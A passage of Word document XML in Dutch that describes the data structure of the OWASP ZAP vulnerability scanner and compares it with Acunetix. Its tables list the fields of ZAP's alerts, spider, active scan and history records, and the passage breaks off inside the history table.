    <w:p w14:paraId="58207990" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Hoe ziet de datastructuur eruit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E477C1" w14:textId="6C202D00" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Ik heb gemerkt dat OWASP ZAP veel meer data verzameld dan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is wat betreft het presenteren van data veel gebruiksvriendelijker en overzichtelijker. OWASP ZAP presenteert bijna alle data in tabellen vergelijkbaar met een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tabel. Het analyseren van de data is dus ook en veeleisende klus. Om dit probleem op te lossen geeft OWASP ZAP de optie om rapporten te genereren. Er zijn drie type rapporten HTML, XML en MD</w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Mark Down) waarvan HTML en MD de meest overzichtelijke, XML is zeer onduidelijk te lezen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D32BAA" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">De entiteiten, tabellen en kolommen zal ik zoals bij </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in tabellen plaatsen. Ik heb 6 entiteiten gevonden: Waarschuwingen, Spider, Actieve scan, Geschiedenis, Http Sessies en Parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3ED8AC" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Waarschuwingen – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Waarschuwingen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn de kwetsbaarheden die tijdens de scan zijn gedetecteerd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B1600" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Spider – De Spider zoekt naar alle pagina’s en indexeert hun als voorbereiding op de aanval. Ook bepaalt de spider wat de scope is van de scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557DDD5" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Actieve scan – De actieve scan voert alle GET en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aanvallen uit op de geïndexeerde doelwitten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E61A6F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Geschiedenis – De geschiedenis houdt een overzicht bij van alle gemaakte </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490D6EF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Http Sessies – De Http Sessies zijn de sessies die gestart worden door de browser. OWASP ZAP gebruikt dit om te controleren of er een actieve sessie bestaat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23927B06" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Parameters – Er wordt een lijst met parameters opgeslagen. Deze worden gebruikt om de aanvallen te verrichten.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00554FF4" w14:paraId="4D479390" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="458653BF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Waarschuwingen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="682DBA77" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF4D899" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="452644E4" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Uniform Resource </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Locator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1F6FF3CF" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5746B1" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="583FB783" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Geeft aan hoe gevaarlijk een kwetsbaarheid is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="3D1E04A7" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E91029" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Vertrouwen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C1DC512" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Geeft aan hoe hoog het vertrouwen is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="114B3396" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43A54E96" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C4BB1E" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De parameter die gebruikt is in de query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="024803C0" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D06B220" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54EC24AE" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De tekst dat gebruikt voor de aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="12D9C729" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC49CBE" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Bewijs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54BDDD25" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Bijgeleverde bewijs voor onderbouwing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="10E5E654" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47BA26E4" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>CWE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B72DF1B" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Common </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weakness</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Enumeration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="6B00C08E" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC1DDFC" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>WASC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6DF299" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Web Application Security Consortium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="5E085BAB" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16E7F3C9" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B802495" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Checkt of het passief is of actief</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01B18C69"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A87BB00" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="13645118" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1D516AE1" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="141D98BD" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Verwerkt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E7944CE" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Check of de URL is verwerkt in de scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="651AFE1C" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="577DFD9F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Methode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1777AC55" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">De HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Verb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> die gebruikt is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="7902316E" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57937214" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8C5769" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Uniform Resource </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Identifier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="2CFAF1BD" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642F4471" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Markeringen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04618A15" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Een opmerking bij een record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3218BCA6"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6A3F11C8" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7A09EFBD" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Actieve Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="4A871477" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109A03B2" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8C7590" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> van de record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="7F85CE3A" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B28FC83" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Request Tijdstempel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E6BFAEB" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Datum en tijd van de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="1F5CE2A0" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B458480" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Response Tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44F8FF09" w14:textId="46BADC4E" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">De </w:t>
            </w:r>
            <w:r w:rsidR="00ED2B5C">
              <w:t>reactietijd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> van de server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="6A1F9C02" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496ECC3F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Methode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A9E6899" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">De HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>verb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> die gebruikt is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="00F00AC7" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B0DE2E" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7148624D" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Uniform Resource </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Locator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="0629EF3F" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13DA2FDD" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="346AF446" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De status code van de Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="45D3C367" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11CBFC80" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Groote Resp. Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A26399" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>De header van de Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="0747F440" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67FC2E44" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Reden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5087DD77" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Dit geeft aan of de Response is gelukt of niet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="5B0529C2" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E7202CE" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>RTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26E28496" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Round</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-trip time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C8A306A"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47F39BC" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4C701FC2" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Geschiedenis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="5FD2FC5D" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD69620" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0649FF47" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">De </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> van de record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="6809CCA0" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C28771E" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t>Request Tijdstempel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="776E92FC" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="0029651C">
            <w:r>
              <w:t xml:space="preserve">Datum en tijd van de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554FF4" w14:paraId="6AE38D4E" w14:textId="77777777" w:rsidTr="0029651C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
